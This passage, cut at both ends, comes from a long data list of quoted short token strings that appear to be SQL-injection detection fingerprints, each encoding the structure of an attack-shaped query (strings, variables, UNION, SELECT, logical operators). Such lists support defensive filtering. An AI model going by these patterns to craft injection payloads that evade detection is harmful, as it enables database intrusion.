"s&v;", "s&v;E", "s&v;T", "s&v;c", "s&vB(", "s&vB1", "s&vBf", "s&vBn", "s&vBs", "s&vBv", "s&vEk", "s&vEn", "s&vTn", "s&vU", "s&vU(", "s&vU;", "s&vUE", "s&vUc", "s&vc", "s&vf(", "s&vk(", "s&vk1", "s&vkf", "s&vkn", "s&vks", "s&vkv", "s&vo(", "s&vof", "s&vos", "s&vs", "s&vs;", "s&vsc", "s&vso", "s(Ef(", "s(Ekf", "s(Ekn", "s(Enk", "s(U(E", "s)&(1", "s)&(E", "s)&(f", "s)&(n", "s)&(s", "s)&(v", "s)&1", "s)&1&", "s)&1)", "s)&1;", "s)&1B", "s)&1U", "s)&1c", "s)&1f", "s)&1o", "s)&f(", "s)&n", "s)&n&", "s)&n)", "s)&n;", "s)&nB", "s)&nU", "s)&nc", "s)&nf", "s)&no", "s)&s", "s)&s&", "s)&s)", "s)&s;", "s)&sB", "s)&sU", "s)&sc", "s)&sf", "s)&so", "s)&v", "s)&v&", "s)&v)", "s)&v;", "s)&vB", "s)&vU", "s)&vc", "s)&vf", "s)&vo", "s),(1", "s),(f", "s),(n", "s),(s", "s),(v", "s);E(", "s);E1", "s);Ef", "s);Ek", "s);En", "s);Eo", "s);Es", "s);Ev", "s);T(", "s);T1", "s);Tf", "s);Tk", "s);Tn", "s);To", "s);Ts", "s);Tv", "s)B(1", "s)B(f", "s)B(n", "s)B(s", "s)B(v", "s)B1", "s)B1&", "s)B1;", "s)B1U", "s)B1c", "s)B1k", "s)B1n", "s)B1o", "s)Bf(", "s)Bn", "s)Bn&", "s)Bn;", "s)BnU", "s)Bnc", "s)Bnk", "s)Bno", "s)Bs", "s)Bs&", "s)Bs;", "s)BsU", "s)Bsc", "s)Bsk", "s)Bso", "s)Bv", "s)Bv&", "s)Bv;", "s)BvU", "s)Bvc", "s)Bvk", "s)Bvo", "s)E(1", "s)E(f", "s)E(n", "s)E(s", "s)E(v", "s)E1c", "s)E1o", "s)Ef(", "s)Ek(", "s)Ek1", "s)Ekf", "s)Ekn", "s)Eks", "s)Ekv", "s)Enc", "s)Eno", "s)Esc", "s)Eso", "s)Evc", "s)Evo", "s)U(E", "s)UE(", "s)UE1", "s)UEf", "s)UEk", "s)UEn", "s)UEs", "s)UEv", "s)c", "s)f(f", "s)k(1", "s)k(f", "s)k(n", "s)k(s", "s)k(v", "s)k1&", "s)k1;", "s)k1B", "s)k1E", "s)k1U", "s)k1o", "s)kB(", "s)kB1", "s)kBf", "s)kBn", "s)kBs", "s)kBv", "s)kUE", "s)kf(", "s)kn&", "s)kn;", "s)knB", "s)knE", "s)knU", "s)knc", "s)knk", "s)ks&", "s)ks;", "s)ksB", "s)ksE", "s)ksU", "s)kso", "s)kv&", "s)kv;", "s)kvB", "s)kvE", "s)kvU", "s)kvo", "s)o(1", "s)o(E", "s)o(f", "s)o(n", "s)o(s", "s)o(v", "s)o1", "s)o1&", "s)o1)", "s)o1;", "s)o1B", "s)o1U", "s)o1c", "s)o1k", "s)of(", "s)on&", "s)on)", "s)on;", "s)onB", "s)onU", "s)onc", "s)onk", "s)os", "s)os&", "s)os)", "s)os;", "s)osB", "s)osU", "s)osc", "s)osk", "s)ov", "s)ov&", "s)ov)", "s)ov;", "s)ovB", "s)ovU", "s)ovc", "s)ovk", "s)ovo", "s,(1)", "s,(1o", "s,(E(", "s,(E1", "s,(Ef", "s,(Ek", "s,(En", "s,(Es", "s,(Ev", "s,(f(", "s,(n)", "s,(no", "s,(s)", "s,(so", "s,(v)", "s,(vo", "s,f()", "s,f(1", "s,f(f", "s,f(n", "s,f(s", "s,f(v", "s1UE", "s1UE;", "s1UEc", "s1UEk", "s1f()", "s1f(1", "s1f(f", "s1f(n", "s1f(s", "s1f(v", "s1nc", "s1s;", "s1s;c", "s1sc", "s1v", "s1v;", "s1v;c", "s1vc", "s1vo(", "s1vof", "s1vos", "s;E(1", "s;E(E", "s;E(f", "s;E(n", "s;E(s", "s;E(v", "s;E1,", "s;E1;", "s;E1T", "s;E1c", "s;E1k", "s;E1o", "s;Ef(", "s;Ek(", "s;Ek1", "s;Ekf", "s;Ekn", "s;Eko", "s;Eks", "s;Ekv", "s;En,", "s;En;", "s;EnE", "s;EnT", "s;Enc", "s;Enk", "s;Eno", "s;Es,", "s;Es;", "s;EsT", "s;Esc", "s;Esk", "s;Eso", "s;Ev,", "s;Ev;", "s;EvT", "s;Evc", "s;Evk", "s;Evo", "s;T(1", "s;T(E", "s;T(c", "s;T(f", "s;T(n", "s;T(s", "s;T(v", "s;T1(", "s;T1,", "s;T1;", "s;T1T", "s;T1c", "s;T1f", "s;T1k", "s;T1o", "s;T;", "s;T;c", "s;TTn", "s;Tf(", "s;Tk(", "s;Tk1", "s;Tkf", "s;Tkk", "s;Tkn", "s;Tko", "s;Tks", "s;Tkv", "s;Tn(", "s;Tn,", "s;Tn1", "s;Tn;", "s;TnE", "s;TnT", "s;Tnc", "s;Tnf", "s;Tnk", "s;Tnn", "s;Tno", "s;Tns", "s;Tnv", "s;To(", "s;Ts(", "s;Ts,", "s;Ts;", "s;TsT", "s;Tsc", "s;Tsf", "s;Tsk", "s;Tso", "s;Tv(", "s;Tv,", "s;Tv;", "s;TvT", "s;Tvc", "s;Tvf", "s;Tvk", "s;Tvo", "s;n:T", "sA(f(", "sA(n)", "sA(no", "sA(s)", "sA(so", "sA(v)", "sA(vo", "sAf()", "sAf(1", "sAf(f", "sAf(n", "sAf(s", "sAf(v", "sAsUE", "sAso(", "sAso1", "sAsof", "sAson", "sAsos", "sAsov", "sAtUE", "sAto(", "sAto1", "sAtof", "sAton", "sAtos", "sAtov", "sAvUE", "sAvo(", "sAvof", "sAvos", "sB(1)", "sB(1o", "sB(f(", "sB(no", "sB(s)", "sB(so", "sB(v)", "sB(vo", "sB1", "sB1&(", "sB1&1", "sB1&f", "sB1&n", "sB1&s", "sB1&v", "sB1,(", "sB1,f", "sB1;", "sB1;c", "sB1B(", "sB1B1", "sB1Bf", "sB1Bn", "sB1Bs", "sB1Bv", "sB1U(", "sB1UE", "sB1c", "sB1k(", "sB1k1", "sB1kf", "sB1kn", "sB1ks", "sB1kv", "sB1o(", "sB1of", "sB1os", "sB1ov", "sBE(1", "sBE(f", "sBE(n", "sBE(s", "sBE(v", "sBEk(", "sBf()", "sBf(1", "sBf(f", "sBf(n", "sBf(s", "sBf(v", "sBn", "sBn&(", "sBn&1", "sBn&f", "sBn&n", "sBn&s", "sBn&v", "sBn,(", "sBn,f", "sBn;", "sBn;c", "sBnB(", "sBnB1", "sBnBf", "sBnBn", "sBnBs", "sBnBv", "sBnU(", "sBnUE", "sBnc", "sBnk(", "sBnk1", "sBnkf", "sBnkn", "sBnks", "sBnkv", "sBno(", "sBnof", "sBnos", "sBnov", "sBs", "sBs&(", "sBs&1", "sBs&f", "sBs&n", "sBs&s", "sBs&v", "sBs,(", "sBs,f", "sBs;", "sBs;c", "sBsB(", "sBsB1", "sBsBf", "sBsBn", "sBsBs", "sBsBv", "sBsU(", "sBsUE", "sBsc", "sBsk(", "sBsk1", "sBskf", "sBskn", "sBsks", "sBskv", "sBso(", "sBso1", "sBsof", "sBson", "sBsos", "sBsov", "sBv", "sBv&(", "sBv&1", "sBv&f", "sBv&n", "sBv&s", "sBv&v", "sBv,(", "sBv,f", "sBv;", "sBv;c", "sBvB(", "sBvB1", "sBvBf", "sBvBn", "sBvBs", "sBvBv", "sBvU(", "sBvUE", "sBvc", "sBvk(", "sBvk1", "sBvkf", "sBvkn", "sBvks", "sBvkv", "sBvo(", "sBvof", "sBvos", "sE(1)", "sE(1o", "sE(f(", "sE(n)", "sE(no", "sE(s)", "sE(so", "sE(v)", "sE(vo", "sE1;T", "sE1T(", "sE1T1", "sE1Tf", "sE1Tn", "sE1Ts", "sE1Tv", "sE1UE", "sE1c", "sE1o(", "sE1of", "sE1os", "sE1ov", "sEU(1", "sEU(f", "sEU(n", "sEU(s", "sEU(v", "sEU1,", "sEU1c", "sEU1o", "sEUEf", "sEUEk", "sEUf(", "sEUs,", "sEUsc", "sEUso", "sEUv,", "sEUvc", "sEUvo", "sEf()", "sEf(1", "sEf(f", "sEf(n", "sEf(s", "sEf(v", "sEk(1", "sEk(E", "sEk(f", "sEk(n", "sEk(s", "sEk(v", "sEk1;", "sEk1T", "sEk1U", "sEk1c", "sEk1o", "sEkU(", "sEkU1", "sEkUE", "sEkUf", "sEkUs", "sEkUv", "sEkf(", "sEkn;", "sEknE", "sEknT", "sEknU", "sEknc", "sEkok", "sEks;", "sEksT", "sEksU", "sEksc", "sEkso", "sEkv;", "sEkvT", "sEkvU", "sEkvc", "sEkvo", "sEn;T", "sEnEn", "sEnT(", "sEnT1", "sEnTf", "sEnTn", "sEnTs", "sEnTv", "sEnUE", "sEnc", "sEno(", "sEnof", "sEnos", "sEnov", "sEokn", "sEs;T", "sEsT(", "sEsT1", "sEsTf", "sEsTn", "sEsTs", "sEsTv", "sEsUE", "sEsc", "sEso(", "sEso1", "sEsof", "sEson", "sEsos", "sEsov", "sEv;T", "sEvT(", "sEvT1", "sEvTf", "sEvTn", "sEvTs", "sEvTv", "sEvUE", "sEvc", "sEvo(", "sEvof", "sEvos", "sT(1)", "sT(1o", "sT(f(", "sT(n)", "sT(no", "sT(s)", "sT(so", "sT(v)", "sT(vo", "sT1(f", "sT1o(", "sT1of", "sT1os", "sT1ov", "sTE(1", "sTE(f", "sTE(n", "sTE(s", "sTE(v", "sTE1n", "sTE1o", "sTEf(", "sTEk(", "sTEk1", "sTEkf", "sTEkn", "sTEks", "sTEkv", "sTEnn", "sTEno", "sTEsn", "sTEso", "sTEvn", "sTEvo", "sTTnE", "sTTnT", "sTTnk", "sTTnn", "sTf()", "sTf(1", "sTf(f", "sTf(n", "sTf(s", "sTf(v", "sTn(1", "sTn(f", "sTn(s", "sTn(v", "sTn1c", "sTn1o", "sTn;E", "sTn;T", "sTn;n", "sTnE(", "sTnE1", "sTnEf", "sTnEn", "sTnEs", "sTnEv", "sTnT(", "sTnT1", "sTnTf", "sTnTn", "sTnTs", "sTnTv", "sTnf(", "sTnkn", "sTnn:", "sTnnc", "sTnno", "sTno(", "sTnof", "sTnos", "sTnov", "sTnsc", "sTnso", "sTnvc", "sTnvo", "sTs(f", "sTso(", "sTso1", "sTsof", "sTson", "sTsos", "sTsov", "sTv(1", "sTv(f", "sTvo(", "sTvof", "sTvos", "sU(1)", "sU(1o", "sU(E(", "sU(E1", "sU(Ef", "sU(Ek", "sU(En", "sU(Es", "sU(Ev", "sU(f(", "sU(n)", "sU(no", "sU(s)", "sU(so", "sU(v)", "sU(vo", "sU1,(", "sU1,f", "sU1c", "sU1o(", "sU1of", "sU1os", "sU1ov", "sU;", "sU;c", "sUE", "sUE(1", "sUE(E", "sUE(f", "sUE(n", "sUE(o", "sUE(s", "sUE(v", "sUE1", "sUE1&", "sUE1(", "sUE1)", "sUE1,", "sUE1;", "sUE1B", "sUE1U", "sUE1c", "sUE1f", "sUE1k", "sUE1n", "sUE1o", "sUE1s", "sUE1v", "sUE;", "sUE;c", "sUEc", "sUEf", "sUEf(", "sUEf,", "sUEf;", "sUEfc", "sUEk", "sUEk(", "sUEk1", "sUEk;", "sUEkc", "sUEkf", "sUEkn", "sUEko", "sUEks", "sUEkv", "sUEn", "sUEn&", "sUEn(", "sUEn)", "sUEn,", "sUEn1", "sUEn;", "sUEnB", "sUEnU", "sUEnc", "sUEnf", "sUEnk", "sUEno", "sUEns", "sUEok", "sUEon", "sUEs", "sUEs&", "sUEs(", "sUEs)", "sUEs,", "sUEs1", "sUEs;", "sUEsB", "sUEsU", "sUEsc", "sUEsf", "sUEsk", "sUEso", "sUEsv", "sUEv", "sUEv&", "sUEv(", "sUEv)", "sUEv,", "sUEv;", "sUEvB", "sUEvU", "sUEvc", "sUEvf", "sUEvk", "sUEvn", "sUEvo", "sUEvs", "sUTn(", "sUTn1", "sUTnf", "sUTnn", "sUTns", "sUTnv", "sUc", "sUf()", "sUf(1", "sUf(f", "sUf(n", "sUf(s", "sUf(v", "sUk(E", "sUo(E", "sUon(", "sUon1", "sUonf", "sUons", "sUs,(", "sUs,f", "sUsc", "sUso(", "sUso1", "sUsof", "sUson", "sUsos", "sUsov", "sUv,(", "sUv,f", "sUvc", "sUvo(", "sUvof", "sUvos", "sc", "sf()1", "sf()U", "sf()f", "sf()k", "sf()n", "sf()o", "sf()s", "sf()v", "sf(1)", "sf(1n", "sf(1o", "sf(E(", "sf(E1", "sf(Ef", "sf(Ek", "sf(En", "sf(Es", "sf(Ev", "sf(f(", "sf(n)", "sf(n,", "sf(no", "sf(s)", "sf(so", "sf(v)", "sf(vo", "sk(1)", "sk(1o", "sk(f(", "sk(n)", "sk(no", "sk(s)", "sk(so", "sk(v)", "sk(vo", "sk)&(", "sk)&1", "sk)&f", "sk)&n", "sk)&s", "sk)&v", "sk);E", "sk);T", "sk)B(", "sk)B1", "sk)Bf", "sk)Bn", "sk)Bs", "sk)Bv", "sk)E(", "sk)E1", "sk)Ef", "sk)Ek", "sk)En", "sk)Es", "sk)Ev", "sk)UE", "sk)f(", "sk)o(", "sk)of", "sk1", "sk1&(", "sk1&1", "sk1&f", "sk1&n", "sk1&s", "sk1&v", "sk1;", "sk1;E", "sk1;T", "sk1;c", "sk1B(", "sk1B1", "sk1Bf", "sk1Bn", "sk1Bs", "sk1Bv", "sk1E(", "sk1E1", "sk1Ef", "sk1Ek", "sk1En", "sk1Es", "sk1Ev", "sk1U(", "sk1UE", "sk1c", "sk1o(", "sk1of", "sk1os", "sk1ov", "skUE(", "skUE1", "skUEf", "skUEk", "skUEn", "skUEs", "skUEv", "skf()", "skf(1", "skf(f", "skf(n", "skf(s", "skf(v", "skn", "skn&(", "skn&1", "skn&f", "skn&n", "skn&s", "skn&v", "skn;", "skn;E", "skn;T", "skn;c", "sknB(", "sknB1", "sknBf", "sknBn", "sknBs", "sknBv", "sknE(", "sknE1", "sknEf", "sknEn", "sknEs", "sknEv", "sknU(", "sknUE", "sknc", "sks", "sks&(", "sks&1", "sks&f", "sks&n", "sks&s", "sks&v", "sks;", "sks;E", "sks;T", "sks;c", "sksB(", "sksB1", "sksBf", "sksBn", "sksBs", "sksBv", "sksE(", "sksE1", "sksEf", "sksEk", "sksEn", "sksEs", "sksEv", "sksU(", "sksUE", "sksc", "skso(", "skso1", "sksof", "skson", "sksos", "sksov", "skv", "skv&(", "skv&1", "skv&f", "skv&n", "skv&s", "skv&v", "skv;", "skv;E", "skv;T", "skv;c", "skvB(", "skvB1", "skvBf", "skvBn", "skvBs", "skvBv", "skvE(", "skvE1", "skvEf", "skvEk", "skvEn", "skvEs", "skvEv", "skvU(", "skvUE", "skvc", "skvo(", "skvof", "skvos", "so(1&", "so(1)", "so(1,", "so(1o", "so(E(", "so(E1", "so(EE", "so(Ef", "so(Ek", "so(En", "so(Eo", "so(Es", "so(Ev", "so(f(", "so(n&", "so(n)", "so(n,", "so(no", "so(s&", "so(s)", "so(s,", "so(so", "so(v&", "so(v)", "so(v,", "so(vo", "so1&(", "so1&1", "so1&E", "so1&U", "so1&f", "so1&k", "so1&n", "so1&s", "so1&v", "so1(E", "so1(U", "so1)&", "so1),", "so1);", "so1)B", "so1)E", "so1)U", "so1)c", "so1)f", "so1)k", "so1)o", "so1,(", "so1,f", "so1;", "so1;E", "so1;T", "so1;c", "so1;n", "so1A(", "so1Af", "so1As", "so1At", "so1Av", "so1B(", "so1B1", "so1BE", "so1Bf", "so1Bn", "so1Bs", "so1Bv", "so1E(", "so1E1", "so1EU", "so1Ef", "so1Ek", "so1En", "so1Eo", "so1Es", "so1Ev", "so1T(", "so1T1", "so1TE", "so1TT", "so1Tf", "so1Tn", "so1Ts", "so1Tv", "so1U", "so1U(", "so1U1", "so1U;", "so1UE", "so1UT", "so1Uc", "so1Uf", "so1Uk", "so1Uo", "so1Us", "so1Uv", "so1c", "so1f(", "so1k(", "so1k)", "so1k1", "so1kB", "so1kU", "so1kf", "so1kn", "so1ks", "so1kv", "so1n&", "so1n(", "so1n,", "so1nE", "so1nU", "so1sU", "so1sv", "so1v(", "so1vU", "so1vf", "so1vo", "so1vs", "soU(E", "soUEk", "soUEn", "sof()", "sof(1", "sof(E", "sof(f", "sof(n", "sof(s", "sof(v", "sok&(", "sok&1", "sok&f", "sok&n", "sok&s", "sok&v", "sok(1", "sok(f", "sok(n", "sok(s", "sok(v", "sok1c", "sok1o", "sokf(", "soknc", "soko(", "soko1", "sokof", "sokon", "sokos", "sokov", "soksc", "sokso", "sokvc", "sokvo", "son&(", "son&1", "son&E", "son&U", "son&f", "son&k", "son&n", "son&s", "son&v", "son(1", "son(E", "son(U", "son(f", "son(s", "son(v", "son)&", "son),", "son);", "son)B", "son)E", "son)U", "son)c", "son)f", "son)k", "son)o", "son,(", "son,f", "son1(", "son1U", "son1o", "son1v", "son;", "son;E", "son;T", "son;c", "son;n", "sonA(", "sonAf", "sonAs", "sonAt", "sonAv", "sonB(", "sonB1", "sonBE", "sonBf", "sonBn", "sonBs", "sonBv", "sonE(", "sonE1", "sonEU", "sonEf", "sonEn", "sonEo", "sonEs", "sonEv", "sonT(", "sonT1", "sonTE", "sonTT", "sonTf", "sonTn", "sonTs", "sonTv", "sonU", "sonU(", "sonU1", "sonU;", "sonUE", "sonUT", "sonUc", "sonUf", "sonUk", "sonUo", "sonUs", "sonUv", "sonf(", "sonk(", "sonk)", "sonk1", "sonkB", "sonkU", "sonkf", "sonks", "sonkv", "sonsU", "sos", "sos&(", "sos&1", "sos&E", "sos&U", "sos&f", "sos&k", "sos&n", "sos&s", "sos&v", "sos(E", "sos(U", "sos)&", "sos),", "sos);", "sos)B", "sos)E", "sos)U", "sos)c", "sos)f", "sos)k", "sos)o", "sos,(", "sos,f", "sos1(", "sos1U", "sos1f", "sos1n", "sos1s", "sos1v", "sos;", "sos;E", "sos;T", "sos;c", "sos;n", "sosA(", "sosAf", "sosAs", "sosAt", "sosAv", "sosB(", "sosB1", "sosBE", "sosBf", "sosBn", "sosBs", "sosBv", "sosE(", "sosE1", "sosEU", "sosEf", "sosEk", "sosEn", "sosEo", "sosEs", "sosEv", "sosT(", "sosT1", "sosTE", "sosTT", "sosTf", "sosTn", "sosTs", "sosTv", "sosU", "sosU(", "sosU1", "sosU;", "sosUE", "sosUT", "sosUc", "sosUf", "sosUk", "sosUo", "sosUs", "sosUv", "sosc", "sosf(", "sosk(", "sosk)", "sosk1", "soskB", "soskU", "soskf", "soskn", "sosks", "soskv", "sosv(", "sosvU", "sosvf", "sosvo", "sosvs", "sov", "sov&(", "sov&1", "sov&E", "sov&U", "sov&f", "sov&k", "sov&n", "sov&s", "sov&v", "sov(E", "sov(U", "sov)&", "sov),", "sov);", "sov)B", "sov)E", "sov)U", "sov)c", "sov)f", "sov)k", "sov)o", "sov,(", "sov,f", "sov;", "sov;E", "sov;T", "sov;c", "sov;n", "sovA(", "sovAf", "sovAs", "sovAt", "sovAv", "sovB(", "sovB1", "sovBE", "sovBf", "sovBn", "sovBs", "sovBv", "sovE(", "sovE1", "sovEU", "sovEf", "sovEk", "sovEn", "sovEo", "sovEs", "sovEv", "sovT(", "sovT1", "sovTE", "sovTT", "sovTf", "sovTn", "sovTs", "sovTv", "sovU", "sovU(", "sovU1", "sovU;", "sovUE", "sovUT", "sovUc", "sovUf", "sovUk", "sovUo", "sovUs", "sovUv", "sovc", "sovf(", "sovk(", "sovk)", "sovk1", "sovkB", "sovkU", "sovkf", "sovkn", "sovks", "sovkv", "sovo(", "sovoU", "sovof", "sovok", "sovos", "sovs(", "sovs1", "sovsU", "sovsf", "sovso", "sovsv", "svUE", "svUE;", "svUEc", "svUEk", "svf()", "svf(1", "svf(f", "svf(n", "svf(s", "svf(v", "svo(1", "svo(f", "svo(n", "svo(s", "svo(v", "svof(", "svos(", "svos1", "svosU", "svosf", "svosv", "svs;", "svs;c", "svsc", "svso(", "svso1", "svsof", "svson", "svsos", "svsov", "v&(1&", "v&(1)", "v&(1,", "v&(1o", "v&(E(", "v&(E1", "v&(Ef", "v&(Ek", "v&(En", "v&(Eo", "v&(Es", "v&(Ev", "v&(f(", "v&(n&", "v&(n)", "v&(n,", "v&(no", "v&(s&", "v&(s)", "v&(s,", "v&(so", "v&(v&", "v&(v)", "v&(v,", "v&(vo", "v&1", "v&1&(", "v&1&1", "v&1&f", "v&1&n", "v&1&s", "v&1&v", "v&1)&", "v&1)U", "v&1)c", "v&1)o", "v&1;", "v&1;E", "v&1;T", "v&1;c", "v&1B(", "v&1B1", "v&1Bf", "v&1Bn", "v&1Bs", "v&1Bv", "v&1Ek", "v&1En", "v&1Tn", "v&1U", "v&1U(", "v&1U;", "v&1UE", "v&1Uc", "v&1c", "v&1f(", "v&1k(", "v&1k1", "v&1kf", "v&1kn", "v&1ks", "v&1kv", "v&1o(", "v&1of", "v&1os", "v&1ov", "v&E(1", "v&E(f", "v&E(n", "v&E(o", "v&E(s", "v&E(v", "v&E1", "v&E1;", "v&E1c", "v&E1k", "v&E1o", "v&Ef(", "v&Ek(", "v&Ek1", "v&Ekf", "v&Ekn", "v&Eks", "v&Ekv", "v&En", "v&En;", "v&Enc", "v&Enk", "v&Eno", "v&Es", "v&Es;", "v&Esc", "v&Esk", "v&Eso", "v&Ev", "v&Ev;", "v&Evc", "v&Evk", "v&Evo", "v&f()", "v&f(1", "v&f(E", "v&f(f", "v&f(n", "v&f(s", "v&f(v", "v&k&(", "v&k&1", "v&k&f", "v&k&n", "v&k&s", "v&k&v", "v&k(1", "v&k(f", "v&k(n", "v&k(s", "v&k(v", "v&k1o", "v&kc", "v&kf(", "v&knk", "v&ko(", "v&ko1", "v&kof", "v&kok", "v&kon", "v&kos", "v&kov", "v&kso", "v&kvo", "v&n", "v&n&(", "v&n&1", "v&n&f", "v&n&n", "v&n&s", "v&n&v", "v&n)&", "v&n)U", "v&n)c", "v&n)o", "v&n;", "v&n;E", "v&n;T", "v&n;c", "v&nB(", "v&nB1", "v&nBf", "v&nBn", "v&nBs", "v&nBv", "v&nEn", "v&nTn", "v&nU", "v&nU(", "v&nU;", "v&nUE", "v&nUc", "v&nc", "v&nf(", "v&nk(", "v&nk1", "v&nkf", "v&nkn", "v&nks", "v&nkv", "v&no(", "v&nof", "v&nos", "v&nov", "v&s", "v&s&(", "v&s&1", "v&s&f", "v&s&n", "v&s&s", "v&s&v", "v&s)&", "v&s)U", "v&s)c", "v&s)o", "v&s1", "v&s1;", "v&s1c", "v&s;", "v&s;E", "v&s;T", "v&s;c", "v&sB(", "v&sB1", "v&sBf", "v&sBn", "v&sBs", "v&sBv", "v&sEk", "v&sEn", "v&sTn", "v&sU", "v&sU(", "v&sU;", "v&sUE", "v&sUc", "v&sc", "v&sf(", "v&sk(", "v&sk1", "v&skf", "v&skn", "v&sks", "v&skv", "v&so(", "v&so1", "v&sof", "v&son", "v&sos", "v&sov", "v&sv", "v&sv;", "v&svc", "v&svo", "v&v", "v&v&(", "v&v&1", "v&v&f", "v&v&n", "v&v&s", "v&v&v", "v&v)&", "v&v)U", "v&v)c", "v&v)o", "v&v;", "v&v;E", "v&v;T", "v&v;c", "v&vB(", "v&vB1", "v&vBf", "v&vBn", "v&vBs", "v&vBv", "v&vEk", "v&vEn", "v&vTn", "v&vU", "v&vU(", "v&vU;", "v&vUE", "v&vUc", "v&vc", "v&vf(", "v&vk(", "v&vk1", "v&vkf", "v&vkn", "v&vks", "v&vkv", "v&vo(", "v&vof", "v&vos", "v&vs", "v&vs;", "v&vsc", "v&vso", "v(Ef(", "v(Ekf", "v(Ekn", "v(Enk", "v(U(E", "v)&(1", "v)&(E", "v)&(f", "v)&(n", "v)&(s", "v)&(v", "v)&1", "v)&1&", "v)&1)", "v)&1;", "v)&1B", "v)&1U", "v)&1c", "v)&1f", "v)&1o", "v)&f(", "v)&n", "v)&n&", "v)&n)", "v)&n;", "v)&nB", "v)&nU", "v)&nc", "v)&nf", "v)&no", "v)&s", "v)&s&", "v)&s)", "v)&s;", "v)&sB", "v)&sU", "v)&sc", "v)&sf", "v)&so", "v)&v", "v)&v&", "v)&v)", "v)&v;", "v)&vB", "v)&vU", "v)&vc", "v)&vf", "v)&vo", "v),(1", "v),(f", "v),(n", "v),(s", "v),(v", "v);E(", "v);E1", "v);Ef", "v);Ek", "v);En", "v);Eo", "v);Es", "v);Ev", "v);T(", "v);T1", "v);Tf", "v);Tk", "v);Tn", "v);To", "v);Ts", "v);Tv", "v)B(1", "v)B(f", "v)B(n", "v)B(s", "v)B(v", "v)B1", "v)B1&", "v)B1;", "v)B1U", "v)B1c", "v)B1k", "v)B1n", "v)B1o", "v)Bf(", "v)Bn", "v)Bn&", "v)Bn;", "v)BnU", "v)Bnc", "v)Bnk", "v)Bno", "v)Bs", "v)Bs&", "v)Bs;", "v)BsU", "v)Bsc", "v)Bsk", "v)Bso", "v)Bv", "v)Bv&", "v)Bv;", "v)BvU", "v)Bvc", "v)Bvk", "v)Bvo", "v)E(1", "v)E(f", "v)E(n", "v)E(s", "v)E(v", "v)E1c", "v)E1o", "v)Ef(", "v)Ek(", "v)Ek1", "v)Ekf", "v)Ekn", "v)Eks", "v)Ekv", "v)Enc", "v)Eno", "v)Esc", "v)Eso", "v)Evc", "v)Evo", "v)U(E", "v)UE(", "v)UE1", "v)UEf", "v)UEk", "v)UEn", "v)UEs", "v)UEv", "v)c", "v)f(f", "v)k(1", "v)k(f", "v)k(n", "v)k(s", "v)k(v", "v)k1&", "v)k1;", "v)k1B", "v)k1E", "v)k1U", "v)k1o", "v)kB(", "v)kB1", "v)kBf", "v)kBn", "v)kBs", "v)kBv", "v)kUE", "v)kf(", "v)kn&", "v)kn;", "v)knB", "v)knE", "v)knU", "v)knc", "v)knk", "v)ks&", "v)ks;", "v)ksB", "v)ksE", "v)ksU", "v)kso", "v)kv&", "v)kv;", "v)kvB", "v)kvE", "v)kvU", "v)kvo", "v)o(1", "v)o(E", "v)o(f", "v)o(n", "v)o(s", "v)o(v", "v)o1", "v)o1&", "v)o1)", "v)o1;", "v)o1B", "v)o1U", "v)o1c", "v)o1k", "v)of(", "v)on", "v)on&", "v)on)", "v)on;", "v)onB", "v)onU", "v)onc", "v)onk", "v)os", "v)os&", "v)os)", "v)os;", "v)osB", "v)osU", "v)osc", "v)osk", "v)ov", "v)ov&", "v)ov)", "v)ov;", "v)ovB", "v)ovU", "v)ovc", "v)ovk", "v)ovo", "v,(1)", "v,(1o", "v,(E(", "v,(E1", "v,(Ef", "v,(Ek", "v,(En", "v,(Es", "v,(Ev", "v,(f(", "v,(n)", "v,(no", "v,(s)", "v,(so", "v,(v)", "v,(vo", "v,f()", "v,f(1", "v,f(f", "v,f(n", "v,f(s", "v,f(v", "v;E(1", "v;E(E", "v;E(f", "v;E(n", "v;E(s", "v;E(v", "v;E1,", "v;E1;", "v;E1T", "v;E1c", "v;E1k", "v;E1o", "v;Ef(", "v;Ek(", "v;Ek1", "v;Ekf", "v;Ekn", "v;Eko", "v;Eks", "v;Ekv", "v;En,", "v;En;", "v;EnE", "v;EnT", "v;Enc", "v;Enk", "v;Eno", "v;Es,", "v;Es;", "v;EsT", "v;Esc", "v;Esk", "v;Eso", "v;Ev,", "v;Ev;", "v;EvT", "v;Evc", "v;Evk", "v;Evo", "v;T(1", "v;T(E", "v;T(c", "v;T(f", "v;T(n", "v;T(s", "v;T(v", "v;T1(", "v;T1,", "v;T1;", "v;T1T", "v;T1c", "v;T1f", "v;T1k", "v;T1o", "v;T;", "v;T;c", "v;TTn", "v;Tf(", "v;Tk(", "v;Tk1", "v;Tkf", "v;Tkk", "v;Tkn", "v;Tko", "v;Tks", "v;Tkv", "v;Tn(", "v;Tn,", "v;Tn1", "v;Tn;", "v;TnE", "v;TnT", "v;Tnc", "v;Tnf", "v;Tnk", "v;Tnn", "v;Tno", "v;Tns", "v;Tnv", "v;To(", "v;Ts(", "v;Ts,", "v;Ts;", "v;TsT", "v;Tsc", "v;Tsf", "v;Tsk", "v;Tso", "v;Tv(", "v;Tv,", "v;Tv;", "v;TvT", "v;Tvc", "v;Tvf", "v;Tvk", "v;Tvo", "v;n:T", "vA(f(", "vA(n)", "vA(no", "vA(s)", "vA(so", "vA(v)", "vA(vo", "vAf()", "vAf(1", "vAf(f", "vAf(n", "vAf(s", "vAf(v", "vAsUE", "vAso(", "vAso1", "vAsof", "vAson", "vAsos", "vAsov", "vAtUE", "vAto(", "vAto1", "vAtof", "vAton", "vAtos", "vAtov", "vAvUE", "vAvo(", "vAvof", "vAvos", "vB(1)", "vB(1o", "vB(f(", "vB(no", "vB(s)", "vB(so", "vB(v)", "vB(vo", "vB1", "vB1&(", "vB1&1", "vB1&f", "vB1&n", "vB1&s", "vB1&v", "vB1,(", "vB1,f", "vB1;", "vB1;c", "vB1B(", "vB1B1", "vB1Bf", "vB1Bn", "vB1Bs", "vB1Bv", "vB1U(", "vB1UE", "vB1c", "vB1k(", "vB1k1", "vB1kf", "vB1kn", "vB1ks", "vB1kv", "vB1o(", "vB1of", "vB1os", "vB1ov", "vBE(1", "vBE(f", "vBE(n", "vBE(s", "vBE(v", "vBEk(", "vBf()", "vBf(1", "vBf(f", "vBf(n", "vBf(s", "vBf(v", "vBn", "vBn&(", "vBn&1", "vBn&f", "vBn&n", "vBn&s", "vBn&v", "vBn,(", "vBn,f", "vBn;", "vBn;c", "vBnB(", "vBnB1", "vBnBf", "vBnBn", "vBnBs", "vBnBv", "vBnU(", "vBnUE", "vBnc", "vBnk(", "vBnk1", "vBnkf", "vBnkn", "vBnks", "vBnkv", "vBno(", "vBnof", "vBnos", "vBnov", "vBs", "vBs&(", "vBs&1", "vBs&f", "vBs&n", "vBs&s", "vBs&v", "vBs,(", 